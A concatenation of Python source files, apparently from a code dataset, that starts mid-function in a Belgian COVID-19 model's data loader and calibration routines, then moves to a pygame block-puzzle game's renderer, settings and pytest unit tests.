'../../../data/raw/sciensano/COVID19BE_HOSP.csv'), parse_dates=['DATE'])
df_mort = pd.read_csv(os.path.join(abs_dir,
'../../../data/raw/sciensano/COVID19BE_MORT.csv'), parse_dates=['DATE'])
# Resample data from all regions and sum all values for each date
df = df.resample('D', on='DATE').sum()
variable_mapping = {"TOTAL_IN": "H_tot",
"TOTAL_IN_ICU": "ICU_tot",
"NEW_IN": "H_in",
"NEW_OUT": "H_out"}
df = df.rename(columns=variable_mapping)
df = df[list(variable_mapping.values())]
df["H_tot_cumsum"] = (df["H_in"] - df["H_out"]).cumsum().values
df["D_tot"] = df_mort.resample('D', on='DATE')['DEATHS'].sum()
# Extract total reported deaths per day and per age group
df["D_25_44"] = df_mort.loc[(df_mort['AGEGROUP'] == '25-44')].resample('D', on='DATE')['DEATHS'].sum()
df["D_45_64"] = df_mort.loc[(df_mort['AGEGROUP'] == '45-64')].resample('D', on='DATE')['DEATHS'].sum()
df["D_65_74"] = df_mort.loc[(df_mort['AGEGROUP'] == '65-74')].resample('D', on='DATE')['DEATHS'].sum()
df["D_75_84"] = df_mort.loc[(df_mort['AGEGROUP'] == '75-84')].resample('D', on='DATE')['DEATHS'].sum()
df["D_85+"] = df_mort.loc[(df_mort['AGEGROUP'] == '85+')].resample('D', on='DATE')['DEATHS'].sum()
return df.fillna(0)
```
#### File: covid19model/models/utils.py
```python
import numpy as np
import pandas as pd
import os
abs_dir = os.path.dirname(__file__)
data_path = os.path.join(abs_dir, "../../../data/")
def sample_beta_binomial(n, p, k, size=None):
p = np.random.beta(k/(1-p), k/p, size=size)
r = np.random.binomial(n, p)
return r
def name2nis(name):
"""
A function to convert the name of a Belgian municipality/arrondissement/province/etc. to its NIS code
Parameters
----------
name : str
the name of the municipality/arrondissement/province/etc.
Returns
-------
NIS : float
the NIS code corresponding with the given name
"""
# Load the list of name-NIS couples
name_df=pd.read_csv(os.path.join(data_path, 'raw/GIS/NIS_name.csv'))
pos_name = name_df['name'].values
# Convert list of possible names to lowercase only
pos_name_lower = [string.lower() for string in pos_name]
name_df['name'] = pos_name_lower
# Check if input is a string
if not isinstance(name,str):
raise TypeError(
"name2nis input must be a string"
)
# Convert input to lowercase
name = name.lower()
# Search for a match and return NIS code
if not name in pos_name_lower:
raise ValueError(
"No match for '{0}' found".format(name)
)
else:
return name_df[name_df['name'] == name]['NIS'].values[0]
def read_coordinates_nis():
"""
A function to extract from /data/interim/census_2011/initN.csv the list of arrondissement NIS codes
Returns
-------
NIS: list
a list containing the NIS codes of the 43 Belgian arrondissements
"""
initN_df=pd.read_csv(os.path.join(data_path, 'interim/census_2011/initN.csv'), index_col=[0])
NIS = initN_df.index.values
return NIS
```
#### File: covid19model/optimization/run_optimization.py
```python
import random
import os
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import datetime
import scipy
from scipy.integrate import odeint
import matplotlib.dates as mdates
import matplotlib
import scipy.stats as st
import math
import xarray as xr
import emcee
import json
import corner
from covid19model.optimization import objective_fcns
from covid19model.optimization import MCMC
from covid19model.models import models
from covid19model.data import google
from covid19model.data import sciensano
from covid19model.data import polymod
from covid19model.data import model_parameters
from covid19model.visualization.optimization import traceplot
initN, Nc_home, Nc_work, Nc_schools, Nc_transport, Nc_leisure, Nc_others, Nc_total = polymod.get_interaction_matrices()
def full_calibration(model, timeseries, spatial_unit, start_date, end_beta, end_ramp,
fig_path, samples_path,
maxiter=50, popsize=50, steps_mcmc=10000):
"""
model : object
initialized model
timeseries : Series
data to fit with date in index
spatial_unit : string
name of the spatial_unit, e.g. Gent, Antwerp, Belgium
start_date, end_beta, end_ramp : string, format YYYY-MM-DD
date of first data point, last date for fitting beta and last date
for fitting the compliance ramp
fig_path : string
path to folder where to save figures
samples_path : string
path to folder where to save samples
maxiter: int (default 50)
maximum number of pso iterations
popsize: int (default 50)
population size of particle swarm
increasing this variable lowers the chance of finding local minima but
slows down calculations
steps_mcmc : int (default 10000)
number of steps in MCMC calibration
"""
plt.ioff()
# define dataset
data=[timeseries[start_date:end_beta]]
states = [["H_in"]]
#############################################
####### CALIBRATING BETA AND LAG_TIME #######
#############################################
# set optimisation settings
parNames_pso = ['sigma_data','extraTime','beta'] # must be a list!
bounds_pso=((1,100),(30,60),(0.02,0.06)) # must be a list!
# run pso optimisation
theta = MCMC.fit_pso(model,data,parNames_pso,states,bounds_pso,maxiter=maxiter,popsize=popsize)
lag_time = int(round(theta[1]))
# Assign 'extraTime' or lag_time as a model attribute --> is needed to perform the optimalization
model.extraTime = int(round(theta[1]))
model.parameters.update({'beta': theta[2]})
parNames_mcmc = ['sigma_data','beta'] # must be a list!
bounds_mcmc=((1,200),(0.01,0.10))
# run MCMC calibration
pos = [theta[0],theta[2]] + [1, 1e-2 ]* np.random.randn(4, 2)
nwalkers, ndim = pos.shape
sampler = emcee.EnsembleSampler(nwalkers, ndim, objective_fcns.log_probability,
args=(model, bounds_mcmc, data, states, parNames_mcmc))
sampler.run_mcmc(pos, steps_mcmc, progress=True);
samples_beta = sampler.get_chain(discard=100,flat=False)
flat_samples_beta = sampler.get_chain(discard=100,flat=True)
try:
sampler.get_autocorr_time()
except:
print('Calibrating beta. Warning: The chain is shorter than 50 times the integrated autocorrelation time for 4 parameter(s). Use this estimate with caution and run a longer chain!')
traceplot(samples_beta,labels=['$\sigma_{data}$','$\\beta$'],plt_kwargs={'linewidth':2,'color': 'red','alpha': 0.15})
plt.savefig(fig_path+'traceplots/beta_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
fig = corner.corner(flat_samples_beta,labels=['$\sigma_{data}$','$\\beta$'])
fig.set_size_inches(8, 8)
plt.savefig(fig_path+'cornerplots/beta_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
#############################################
####### CALIBRATING COMPLIANCE PARAMS #######
#############################################
samples_beta = {'beta': flat_samples_beta[:,1].tolist()}
# Create checkpoints dictionary
chk_beta_pso = {
'time': [lag_time],
'Nc': [0.2*Nc_home + 0.3*Nc_work + 0.2*Nc_transport],
}
# define dataset
data=[timeseries[start_date:end_ramp]]
# set optimisation settings
parNames_pso2 = ['sigma_data','l','tau','prevention'] # must be a list!
bounds_pso2=((1,100),(0.1,20),(0,20),(0,1)) # must be a list!
# run optimisation
theta = MCMC.fit_pso(model, data, parNames_pso2, states, bounds_pso2,
checkpoints=chk_beta_pso, samples=samples_beta, maxiter=maxiter,popsize=popsize)
model.parameters.update({'l': theta[1], 'tau': theta[2]})
prevention = theta[2]
# Create checkpoints dictionary
chk_beta_MCMC = {
'time': [lag_time],
'Nc': [prevention*(1.0*Nc_home + 0.4*Nc_work + 0.3*Nc_transport + 0.7*Nc_others + 0.2*Nc_leisure)]}
bounds_mcmc2=((1,100),(0.001,20),(0,20),(0,1)) # must be a list!
pos = theta + [1, 0.1, 0.1, 0.1 ]* np.random.randn(8, 4)
nwalkers, ndim = pos.shape
sampler = emcee.EnsembleSampler(nwalkers, ndim, objective_fcns.log_probability,
args=(model,bounds_mcmc2,data,states,parNames_pso2,chk_beta_MCMC,samples_beta))
sampler.run_mcmc(pos, steps_mcmc, progress=True);
try:
sampler.get_autocorr_time()
except:
print('Calibrating compliance ramp. Warning: The chain is shorter than 50 times the integrated autocorrelation time for 4 parameter(s). Use this estimate with caution and run a longer chain!')
samples_ramp = sampler.get_chain(discard=200,flat=False)
flat_samples_ramp = sampler.get_chain(discard=200,flat=True)
traceplot(samples_ramp, labels=["$\sigma_{data}$","l","$\\tau$","prevention"],
plt_kwargs={'linewidth':2,'color': 'red','alpha': 0.15})
plt.savefig(fig_path+'traceplots/ramp_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
fig = corner.corner(flat_samples_ramp, labels=["$\sigma_{data}$","l","$\\tau$","$\Omega$"])
fig.set_size_inches(9, 9)
plt.savefig(fig_path+'cornerplots/ramp_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
#############################################
####### CALCULATING R0 ######################
#############################################
R0 =[]
for i in range(len(samples_beta['beta'])):
R0.append(sum((model.parameters['a']*model.parameters['da']+model.parameters['omega'])*samples_beta['beta'][i]*model.parameters['s']*np.sum(Nc_total,axis=1)*(initN/sum(initN))))
R0_stratified = np.zeros([initN.size,len(samples_beta['beta'])])
for i in range(len(samples_beta['beta'])):
R0_stratified[:,i]= (model.parameters['a']*model.parameters['da']+model.parameters['omega'])*samples_beta['beta'][i]*model.parameters['s']*np.sum(Nc_total,axis=1)
R0_stratified_dict = pd.DataFrame(R0_stratified).T.to_dict(orient='list')
samples_dict={'calibration_data':states[0][0], 'start_date':start_date,
'end_beta':end_beta, 'end_ramp':end_ramp,
'maxiter': maxiter, 'popsize':popsize, 'steps_mcmc':steps_mcmc,
'R0':R0, 'R0_stratified_dict':R0_stratified_dict,
'lag_time': lag_time, 'beta': samples_beta['beta'],
'l': flat_samples_ramp[:,1].tolist(),'tau':flat_samples_ramp[:,2].tolist(),
'prevention':flat_samples_ramp[:,3].tolist()}
with open(samples_path+str(spatial_unit)+'_'+str(datetime.date.today())+'.json', 'w') as fp:
json.dump(samples_dict, fp)
plt.ion()
return samples_dict
```
|
{
"source": "Jenna-wang-0965/BlockyGame",
"score": 3
}
|
#### File: Jenna-wang-0965/BlockyGame/renderer.py
```python
from typing import Dict, List, Tuple, Optional
import pygame
from actions import ROTATE_CLOCKWISE, ROTATE_COUNTER_CLOCKWISE,\
SWAP_HORIZONTAL, SWAP_VERTICAL, SMASH, ACTION_KEY, ACTION_LABEL, COMBINE,\
PAINT, PASS
from settings import BACKGROUND_COLOUR, TEXT_COLOUR, OUTLINE_THICKNESS, \
OUTLINE_COLOUR, HIGHLIGHT_THICKNESS, HIGHLIGHT_COLOUR, COLOUR_LIST, \
colour_name
Y_FONT_PADDING = 2
def _load_image(path_to_file: str) -> pygame.Surface:
"""
Load an image from <path_to_file>.
If an error occurs, print it before exiting the program.
"""
try:
image = pygame.image.load(path_to_file)
except pygame.error as e:
# Avoid outputting the stack trace, just show the error
print('ERROR: ', e)
raise SystemExit
return image
def _print_to_image(text: str, x: int, y: int, font: pygame.font.Font,
image: pygame.Surface,
colour: Tuple[int, int, int] = TEXT_COLOUR) -> None:
"""Use <font> to print <text> to (<x>, <y>) on <image> with <colour>.
"""
text_surface = font.render(text, 1, colour)
image.blit(text_surface, (x, y))
def _print_human_instructions(x: int, y: int, text_height: int,
font: pygame.font.Font, image: pygame.Surface)\
-> int:
# Print a heading
_print_to_image('Human Controls', x, y, font, image)
# Indent the next items
x += 10
y += text_height + Y_FONT_PADDING
text = 'Increase Level: S'
_print_to_image(text, x, y, font, image)
y += text_height + Y_FONT_PADDING
text = 'Decrease Level: W'
_print_to_image(text, x, y, font, image)
y += text_height + Y_FONT_PADDING
for action, key in ACTION_KEY.items():
key_name = pygame.key.name(key).upper()
label = ACTION_LABEL[action]
text = f'{label}: {key_name}'
_print_to_image(text, x, y, font, image)
y += text_height + Y_FONT_PADDING
return y
def _print_ai_instructions(x: int, y: int, text_height: int,
font: pygame.font.Font, image: pygame.Surface)\
-> int:
_print_to_image('Non-Human Controls', x, y, font, image)
# Indent the next item
x += 10
y += text_height + Y_FONT_PADDING
_print_to_image('Click Mouse to Continue', x, y, font, image)
y += text_height + Y_FONT_PADDING
return y
def _print_colours(x: int, y: int, text_height: int,
font: pygame.font.Font, image: pygame.Surface)\
-> int:
_print_to_image('Colours', x, y, font, image)
# Indent the next item
x += 10
y += text_height + Y_FONT_PADDING
for c in COLOUR_LIST:
_print_to_image(colour_name(c), x, y, font, image, c)
y += text_height + Y_FONT_PADDING
return y
def _print_instructions(screen: pygame.Surface,
font: pygame.font.Font, height: int) -> \
pygame.Surface:
text_height = font.size("Test")[1]
image = screen.subsurface(((750, 0), (250, height)))
# Setup the initial position
x_pos = 10
y_pos = 5
y_pos = _print_human_instructions(x_pos, y_pos, text_height, font, image)
y_pos += text_height + Y_FONT_PADDING
y_pos = _print_ai_instructions(x_pos, y_pos, text_height, font, image)
y_pos += text_height + Y_FONT_PADDING
_print_colours(x_pos, y_pos, text_height, font, image)
return image
class Renderer:
"""
A class designed to handle drawing the different aspects of a Blocky game.
"""
# === Private Attributes ===
# _screen:
# The pygame image to draw on for visualizing graphics.
# _font:
# The font to use for text being drawn.
# _images:
# A dictionary mapping actions to images that are displayed in the game.
# _status_position:
# The (x, y) position of the status messages.
_screen: pygame.Surface
_instructions: pygame.Surface
_images: Dict[Tuple[str, Optional[int]], pygame.Surface]
_font: pygame.font.Font
_status_position: Tuple[int, int]
_clear_rect: Tuple[Tuple[int, int], Tuple[int, int]]
def __init__(self, size: int) -> None:
"""Initialize this Renderer for a board with dimensions <size> x <size>.
"""
self._font = pygame.font.Font(pygame.font.get_default_font(), 14)
status_height = self._font.size("Player")[1]
instructions_width = 250
height = size + status_height + 2 * Y_FONT_PADDING
width = size + instructions_width
self._screen = pygame.display.set_mode((width, height))
self._instructions = _print_instructions(self._screen, self._font,
height)
self._status_position = (10, size + Y_FONT_PADDING)
self._clear_rect = ((0, 0), (size, height))
self._images = {
ROTATE_CLOCKWISE: _load_image('images/rotate-cw.png'),
ROTATE_COUNTER_CLOCKWISE: _load_image('images/rotate-ccw.png'),
SWAP_HORIZONTAL: _load_image('images/swap-horizontal.png'),
SWAP_VERTICAL: _load_image('images/swap-vertical.png'),
SMASH: _load_image('images/smash.png'),
COMBINE: _load_image('images/combine.png'),
PAINT: _load_image('images/paint.png'),
PASS: _load_image('images/pass.png')
}
def clear(self) -> None:
"""Clear the screen with BACKGROUND_COLOUR.
"""
self._screen.fill(BACKGROUND_COLOUR, self._clear_rect)
def draw_image(self, action: Tuple[str, Optional[int]],
pos: Tuple[int, int], size: int) -> None:
"""Draw the image that coincides with action at pos, stretched to fit
size.
If the action is not supported, no image is drawn.
"""
if action in self._images:
image = self._images[action]
image = pygame.transform.scale(image, (size, size))
self._screen.blit(image, pos)
def draw_board(self, squares: List[Tuple[Tuple[int, int, int],
Tuple[int, int], int]]) -> None:
"""Draw each block in blocks onto the screen.
"""
for colour, pos, size in squares:
rect = (pos[0], pos[1], size, size)
pygame.draw.rect(self._screen, colour, rect, 0)
pygame.draw.rect(self._screen, OUTLINE_COLOUR, rect,
OUTLINE_THICKNESS)
def highlight_block(self, pos: Tuple[int, int], size: int) -> None:
"""Draw a highlighted square border at pos with size.
"""
rect = (pos[0], pos[1], size, size)
pygame.draw.rect(self._screen, HIGHLIGHT_COLOUR, rect,
HIGHLIGHT_THICKNESS)
def text_height(self) -> int:
"""Return the height between lines of text in pixels.
"""
return self._font.size("Test")[1] + Y_FONT_PADDING
def print(self, text: str, x: int, y: int) -> None:
"""Print <text> to the (<x>, <y>) location on the screen.
"""
_print_to_image(text, x, y, self._font, self._screen)
def draw_status(self, message: str) -> None:
"""Draw the current status of the game.
"""
surface = self._font.render(message, 1, TEXT_COLOUR)
self._screen.blit(surface, self._status_position)
def save_to_file(self, filename: str) -> None:
"""Save the current graphics on the screen to a file named #.
"""
pygame.image.save(self._screen, filename)
```
#### File: Jenna-wang-0965/BlockyGame/settings.py
```python
from typing import Tuple
# Colours that we could use in the game
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
PACIFIC_POINT = (1, 128, 181)
OLD_OLIVE = (138, 151, 71)
REAL_RED = (199, 44, 58)
MELON_MAMBO = (234, 62, 112)
DAFFODIL_DELIGHT = (255, 211, 92)
TEMPTING_TURQUOISE = (75, 196, 213)
# A pallette of the colours we use in the game
COLOUR_LIST = [PACIFIC_POINT, REAL_RED, OLD_OLIVE, DAFFODIL_DELIGHT]
# The game board will be a square with this size.
BOARD_SIZE = 750
# The background will be this colour.
BACKGROUND_COLOUR = BLACK
# Text will have this colour.
TEXT_COLOUR = WHITE
# Blocks will have this colour outline.
OUTLINE_COLOUR = BLACK
# Blocks will have this thick of an outline.
OUTLINE_THICKNESS = 3
# Blocks will be highlighted with this colour.
HIGHLIGHT_COLOUR = TEMPTING_TURQUOISE
# Highlighted blocks will have this thickness to the highlight.
HIGHLIGHT_THICKNESS = 5
# The number of seconds a move is animated for.
ANIMATION_DURATION = 1
def colour_name(colour: Tuple[int, int, int]) -> str:
"""Return the colour name associated with this colour value, or the empty
string if this colour value isn't in our colour list.
>>> colour_name((1, 128, 181))
'Pacific Point'
>>> colour_name(PACIFIC_POINT)
'Pacific Point'
"""
colour_names = {
PACIFIC_POINT: 'Pacific Point',
REAL_RED: 'Real Red',
OLD_OLIVE: 'Old Olive',
DAFFODIL_DELIGHT: 'Daffodil Delight'
}
if colour in colour_names:
return colour_names[colour]
else:
return ''
```
#### File: Jenna-wang-0965/BlockyGame/unit_test.py
```python
from __future__ import annotations
from typing import *
import os
import pygame
import pytest
from block import Block
from blocky import _block_to_squares
from goal import BlobGoal, PerimeterGoal, _flatten, generate_goals
from player import _get_block, create_players, HumanPlayer, RandomPlayer, SmartPlayer
from renderer import Renderer
from settings import COLOUR_LIST
def set_children(block: Block, colours: List[Optional[Tuple[int, int, int]]]) \
-> None:
"""Set the children at <level> for <block> using the given <colours>.
Precondition:
- len(colours) == 4
- block.level + 1 <= block.max_depth
"""
size = block._child_size()
positions = block._children_positions()
level = block.level + 1
depth = block.max_depth
block.children = [] # Potentially discard children
for i in range(4):
b = Block(positions[i], size, colours[i], level, depth)
block.children.append(b)
# TODO: ~~~~~~ TASK 1 ~~~~~~ ~~~~~~ TASK 1 ~~~~~~ ~~~~~~ TASK 1 ~~~~~~
def test_rotate_1() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# Nothing at level 3
# a copy of the board
copy_board = board.create_copy()
assert board.smash() is False
assert board.children[0].smash() is False
assert id(copy_board) != id(board)
assert copy_board == board
assert board.smashable() is False
assert board.smash() is False
assert board.children[0].smash() is False
# swap vertically
assert board.swap(1) is True
assert board.children[0].colour == COLOUR_LIST[3]
assert board.children[1].colour == COLOUR_LIST[1]
assert board.children[2].colour == COLOUR_LIST[2]
assert board.children[3].colour is None
assert board.children[3].children[0].colour == COLOUR_LIST[1]
assert board.children[3].children[2].colour == COLOUR_LIST[3]
# swap vertically again
assert board.swap(1) is True
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[2].colour == COLOUR_LIST[1]
assert board.children[1].colour == COLOUR_LIST[2]
assert board.children[0].colour is None
assert board.children[0].children[0].colour == COLOUR_LIST[1]
assert board.children[0].children[2].colour == COLOUR_LIST[3]
assert board.children[1].swap(1) is False
assert board.children[1].swap(2) is False
assert copy_board == board
assert id(copy_board) != id(board)
# swap horizontally
assert board.swap(0) is True
assert board.children[2].colour == COLOUR_LIST[3]
assert board.children[3].colour == COLOUR_LIST[1]
assert board.children[0].colour == COLOUR_LIST[2]
assert board.children[1].colour is None
assert board.children[1].children[0].colour == COLOUR_LIST[1]
assert board.children[1].children[2].colour == COLOUR_LIST[3]
assert board.children[3].level - 1 == board.level
assert board.children[1].max_depth == board.max_depth
# swap horizontally again
assert board.swap(0) is True
assert copy_board == board
assert id(copy_board) != id(board)
assert board.children[0].swap(1) is True
assert board.children[0].swap(1) is True
assert board.children[0].swap(0) is True
assert board.children[0].swap(0) is True
# assert board.children[1].smash() is True
assert board.children[1].combine() is False
assert board.children[2].combine() is False
assert board.children[0].combine() is False
assert board.children[0].combine() is False
assert board.children[3].combine() is False
assert board.children[0].colour is None
assert board.children[1].colour == COLOUR_LIST[2]
#
assert board.children[3].combine() is False
assert board.children[3].combine() is False
assert board.children[3].colour == COLOUR_LIST[3]
def test_smash_and_paint_2() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 0)
assert board.level == board.max_depth
assert board.paint(COLOUR_LIST[1]) is False
assert board.paint(COLOUR_LIST[2]) is True
assert board.smash() is False
assert board.combine() is False
def test_smash_3() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.children == []
assert board.smash() is True
assert len(board.children) == 4
assert board.children[3].level - 1 == board.level
assert board.children[1].max_depth == board.max_depth
assert board.children[0].smash() is False
def test_rotate_4() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.rotate(1) is False
assert board.rotate(3) is False
def test_rotate_5() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 1)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
copy_board = board.create_copy()
# Rotate Clockwise
assert board.rotate(1) is True
assert board.children[0].colour == COLOUR_LIST[2]
assert board.children[1].colour == COLOUR_LIST[0]
assert board.children[2].colour == COLOUR_LIST[2]
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[1].level - 1 == board.level
assert board.children[3].level - 1 == board.level
assert board.paint(COLOUR_LIST[0]) is False
assert board.children[0].paint(COLOUR_LIST[2]) is False
assert board.children[0].paint(COLOUR_LIST[0]) is True
assert board.children[0].paint(COLOUR_LIST[2]) is True
# Rotate ColockWise
assert board.rotate(1) is True
assert board.children[1].colour == COLOUR_LIST[2]
assert board.children[2].colour == COLOUR_LIST[3]
assert board.children[3].colour == COLOUR_LIST[2]
assert board.children[0].colour == COLOUR_LIST[0]
assert board.children[1].level - 1 == board.level
assert board.children[3].level - 1 == board.level
assert board.children[1].max_depth == board.max_depth
# Rotate Counter_clockwise
assert board.rotate(3) is True
assert board.children[0].colour == COLOUR_LIST[2]
assert board.children[1].colour == COLOUR_LIST[0]
assert board.children[2].colour == COLOUR_LIST[2]
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[1].level - 1 == board.level
assert board.children[3].level - 1 == board.level
# Rotate Counter-clockwise
assert board.rotate(3) is True
assert board == copy_board
def test_rotate_6() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
copy_board = board.create_copy()
assert board.children[0].combine() is False
assert board.children[2].combine() is False
# Rotate clockwise
assert board.rotate(1) is True
assert board.children[0].colour is None
assert board.children[1].colour == COLOUR_LIST[0]
assert board.children[2].colour is None
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[1].level - 1 == board.level
assert board.children[0].children[0].colour == COLOUR_LIST[2]
assert board.children[0].children[1].colour == COLOUR_LIST[0]
assert board.children[0].children[2].colour == COLOUR_LIST[2]
assert board.children[0].children[3].colour == COLOUR_LIST[1]
assert board.children[0].children[2].level - 2 == board.level
assert board.children[0].children[0].rotate(1) is False
assert board.paint(COLOUR_LIST[2]) is False
assert board.children[3].paint(COLOUR_LIST[3]) is False
assert board.children[3].paint(COLOUR_LIST[0]) is False
assert board.children[0].children[3].paint(COLOUR_LIST[1]) is False
assert board.children[0].children[0].paint(COLOUR_LIST[1]) is True
assert board.children[0].children[0].paint(COLOUR_LIST[2]) is True
assert board.children[2].children[0].colour == COLOUR_LIST[1]
assert board.children[2].children[1].colour == COLOUR_LIST[3]
assert board.children[2].children[2].colour == COLOUR_LIST[2]
assert board.children[2].children[3].colour == COLOUR_LIST[0]
assert board.children[2].children[2].level - 2 == board.level
assert board.children[2].children[0].rotate(1) is False
copy_copy_no1 = board.create_copy()
# Rotate clockwise again
assert board.rotate(1) is True
assert board.children[3].colour is None
assert board.children[0].colour == COLOUR_LIST[0]
assert board.children[1].colour is None
assert board.children[2].colour == COLOUR_LIST[3]
assert board.children[3].children[3].colour == COLOUR_LIST[2]
assert board.children[3].children[0].colour == COLOUR_LIST[0]
assert board.children[3].children[1].colour == COLOUR_LIST[2]
assert board.children[3].children[2].colour == COLOUR_LIST[1]
assert board.children[3].children[2].level - 2 == board.level
assert board.children[3].children[0].rotate(1) is False
assert board.children[1].children[3].colour == COLOUR_LIST[1]
assert board.children[1].children[0].colour == COLOUR_LIST[3]
assert board.children[1].children[1].colour == COLOUR_LIST[2]
assert board.children[1].children[2].colour == COLOUR_LIST[0]
assert board.children[1].children[2].level - 2 == board.level
assert board.children[1].children[0].rotate(1) is False
# Rotate Counter-clockwise
assert board.rotate(3) is True
assert copy_copy_no1 == board
# Rotate Counter-clockwise
assert board.rotate(3) is True
assert copy_board == board
assert board.children[1].combine() is True
assert board.children[1].combine() is False
assert board.children[1].colour == COLOUR_LIST[2]
assert board.children[3].combine() is False
assert board.children[3].combine() is False
assert board.children[0].colour == COLOUR_LIST[3]
def test_paint_7() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.paint(COLOUR_LIST[2]) is False
assert board.combine() is False
# TODO: ~~~~~~ TASK 2 ~~~~~~ ~~~~~~ TASK 2 ~~~~~~ ~~~~~~ TASK 2 ~~~~~~
def test_smash8() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3]]
set_children(board, colours)
copy_board = board.create_copy()
assert board.children[0].smash() is True
assert board.children[0].smash() is False
assert board.children[0].children[0].smash() is False
assert board.children[3].position == (375, 375)
assert board.children[2].position == (0, 375)
assert board.children[0].children[0].position == (563, 0)
assert board.children[0].children[1].position == (375, 0)
assert board.children[0].children[2].position == (375, 188)
assert board.children[0].children[3].position == (563, 188)
def test_smash_9() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 0)
assert board.smash() is False
assert board.smash() is False
def test_smash_10() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.smash() is True
assert board.children[0].position == (375, 0)
assert board.children[1].position == (0, 0)
assert board.children[2].position == (0, 375)
assert board.children[3].position == (375, 375)
assert board.children[0].smash() is False
assert board.children[2].smash() is False
def test_block_to_squares_11() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
block_squares = _block_to_squares(board)
assert len(block_squares) == 4
assert ((COLOUR_LIST[3]), (375, 0), 375) in block_squares
assert ((COLOUR_LIST[2]), (0, 0), 375) in block_squares
assert ((COLOUR_LIST[0]), (0, 375), 375) in block_squares
assert ((COLOUR_LIST[2]), (375, 375), 375) in block_squares
def test_block_to_squares_12() -> None:
# level 0
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
# Level 1
block_squares = _block_to_squares(board)
assert len(block_squares) == 1
assert (COLOUR_LIST[1], (0, 0), 750) in block_squares
def test_block_to_squares_13() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# level 3
block_squares = _block_to_squares(board)
assert len(block_squares) == 7
assert (COLOUR_LIST[1], (563, 0), 188) in block_squares
assert (COLOUR_LIST[1], (375, 0), 188) in block_squares
assert (COLOUR_LIST[3], (375, 188), 188) in block_squares
assert (COLOUR_LIST[0], (563, 188), 188) in block_squares
assert (COLOUR_LIST[2], (0, 0), 375) in block_squares
assert (COLOUR_LIST[1], (0, 375), 375) in block_squares
assert (COLOUR_LIST[3], (375, 375), 375) in block_squares
def test_block_to_squares_14() -> None:
# Level 0
board = Block((0, 0), 1000, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
block_squares = _block_to_squares(board)
assert len(block_squares) == 10
assert (COLOUR_LIST[3], (500, 0), 500) in block_squares
assert (COLOUR_LIST[1], (250, 0), 250) in block_squares
assert (COLOUR_LIST[2], (0, 0), 250) in block_squares
assert (COLOUR_LIST[0], (0, 250), 250) in block_squares
assert (COLOUR_LIST[2], (250, 250), 250) in block_squares
assert (COLOUR_LIST[0], (0, 500), 500) in block_squares
assert (COLOUR_LIST[0], (750, 500), 250) in block_squares
assert (COLOUR_LIST[1], (500, 500), 250) in block_squares
assert (COLOUR_LIST[3], (500, 750), 250) in block_squares
assert (COLOUR_LIST[2], (750, 750), 250) in block_squares
# TODO: ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~
def test_generate_goals_15() -> None:
goal = generate_goals(2)
colour = COLOUR_LIST.copy()
assert len(goal) == 2
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
def test_generate_goals_16() -> None:
goal = generate_goals(0)
assert len(goal) == 0
assert goal == []
def test_generate_goals_17() -> None:
goal = generate_goals(4)
colour = COLOUR_LIST.copy()
assert len(goal) == 4
